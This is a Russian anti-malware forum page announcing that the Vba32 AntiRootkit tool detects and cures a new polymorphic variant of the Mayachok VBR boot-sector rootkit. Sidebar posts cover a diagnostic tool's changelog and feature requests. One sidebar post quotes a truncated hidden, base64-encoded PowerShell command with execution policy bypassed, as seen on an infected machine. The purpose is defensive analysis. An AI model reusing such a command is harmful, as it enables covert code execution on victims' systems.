Перейти к содержанию
AM_Bot

Антируткит Vba32Arkit успешно справляется с новой версией VBR-руткита семейства Mayachok

Recommended Posts

AM_Bot

В январе мы сообщали о выпуске бета-версии Vba32 AntiRootkit 3.12.5.6, в которой была добавлена возможность анализа и восстановления загрузочных секторов логических дисков NTFS (в том числе и с использованием антивирусного ядра Vba32).

Данный функционал наряду с применением библиотеки низкоуровневого доступа к диску позволил одними из первых успешно детектировать и лечить новую модификацию Trojan.Mayachok. 

«Обнаружился семпл, который неожиданно оказался реинкарнацией уже немного подзабытого VBR-руткита Trojan.Mayachok.2 (Rootkit.Boot.Cidox.b*). Подзабытого хотя бы на фоне развязавшегося мешка с «безруткитным» Trojan.Mayachok.1», – сообщил Михаил Касимов, независимый исследователь и активный бета-тестер продукта Vba32 AntiRootkit, на
форуме Anti-Malware
.

image001.png

В отличие от предшественников, эта модификация имеет полиморфный распаковщик, а также осуществляет перехваты для блокировки возможности восстановления оригинального загрузочного кода.

Кроме того, новую версию Mayachok.2 (Rootkit.Boot.Cidox.B) отличает наличие IRP-перехвата IRP_MJ_INTERNAL_DEVICE_CONTROL.

image004.gif

14 февраля были выпущены обновленные базы с детектом загрузочных секторов Rootkit.Cidox.b.

image005.png

Лечение осуществляется с помощью команды «Restore VBR and Force Reboot».

image007.png

* По классификации компании ВирусБлокАда

Подробнее

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

  • Сообщения

    • PR55.RP55
      Допустим: '%WINDIR%\syswow64\cmd.exe' /c powershell -nop -exec bypass -win Hidden -noni -enc aQBmACgAWwBJAG4AdABQAHQAcgBdADoAOgBTAGkAegBlACAALQBlAHEAIAA0ACkAewAkAGIAPQAnAHAAbwB3AGUAcgBzAGgAZQBsAGwALgBlAHgAZQAnAH0AZQBsAHMAZQB7ACQAYg... '<SYSTEM32>\rundll32.exe' <SYSTEM32>\FirewallControlPanel.dll,ShowNotificationDialog /configure /ETOnly 0 /OnProfiles 6 /OtherAllowed 0 /OtherBlocked 0 /OtherEdgeAllowed 0 /NewBlocked 4 "%WINDIR%\syswow64\windowspowersh... Было бы неплохо, если бы в Инфо. объекта. Прописывались данные по настройке  разрешений Firewall. + Отдельная категория по Firewall - что разрешено, что заблокировано.
    • SQx
    • SQx
      Спасибо,  как раз появился новый случай.
        DhcpDomain REG_SZ domain.name DhcpNameServer REG_SZ 192.168.1.1  
    • demkd
      ---------------------------------------------------------
       4.11.9
      ---------------------------------------------------------
       o Твик #39 теперь дополнительно включает отслеживание командных строк завершенных процессов, командные строки отображаются в окне информации.
         Только для Windows 8.1/Windows Server 2012 R2 и старше.  o WLBSCTRL.DLL теперь автоматически получает статус подозрительного файла.  o В окне информации сетевого адаптера (в разделе DNS) теперь отображается поле DHCP Domain при его наличии.  
    • PR55.RP55
      https://habr.com/ru/post/214953/ На подобное событие антивирус также может реагировать - если сервер будет в чёрном списке. Да и уязвимости...  
×